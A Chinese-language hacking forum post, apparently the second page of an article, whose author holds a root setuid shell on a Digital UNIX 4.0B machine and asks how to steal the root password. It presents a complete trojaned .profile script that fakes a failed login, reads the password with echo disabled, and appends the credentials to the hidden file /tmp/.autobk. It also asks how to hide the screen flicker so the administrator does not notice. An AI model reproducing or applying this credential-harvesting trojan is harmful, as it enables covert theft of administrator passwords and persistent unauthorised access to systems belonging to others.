一种很奇特的入侵主机的方法

好了，看在我敲得手指发麻的份上，您也该回答我一个问题了：
条件：已获得某主机的rootshell，假设名为.fool (-rwsr-xr-x 1 root system 131072 .fool)
目标：获得该主机root的帐号
提示：方法一:即然已是root，可以装一个sniffer，嗅探口令，不过主机是Digital 4.0B，常见的esniff，dsniff，sniffit都不能运行，你再推荐一个？
方法二：做一个假LOGIN的SHELL，将原LOGIN程序改名，收集了帐号的口令后调用真的LOGIN程序，但我发现LOGIN程序一旦改名就不能运行了！
方法三：在root的HOME目录中改它的.profile如下：
clear
echo
echo
echo "Digital UNIX (lwh000) (ttyp0)"
echo
echo "login:root"
echo "Password:"
echo "Login incorrect"
echo "login:\c"
read lgin
stty -echo
echo "Password:\c"
read pw
stty echo
echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk
echo
echo "Last login: Tue Jul 18 11:05:25 from pa1002"
echo
echo "Digital UNIX V4.0B (Rev. 564); Sat Mar 18 11:02:04 CST 2000"
# 中间这一段太长，就不写了，实际上就是伪装主机的欢迎词
echo
echo
# 这以下是root的原.profile
PATH=$HOME/bin:${PATH:-/usr/bin:.}
export PATH
if [ ! "$DT" ]; then
stty dec
tset -I -Q
fi
看出来没，实际上root正确登录后，第一句clear擦掉欢迎词，然后伪写登录不成功，让他再输一次，然后记录下来，再伪写上欢迎词，执行正常的.profile内容。
但是TELNET反应是较慢的，第一句clear再快也能看出屏幕有一个闪烁，细心的root也许会留意，如果能关掉UNIX的欢迎词就好了，怎么做？
当然，只要能达成目标，您尽可以提出您的方法，不要拘泥于我想的这几种.

上一页  [1] [2]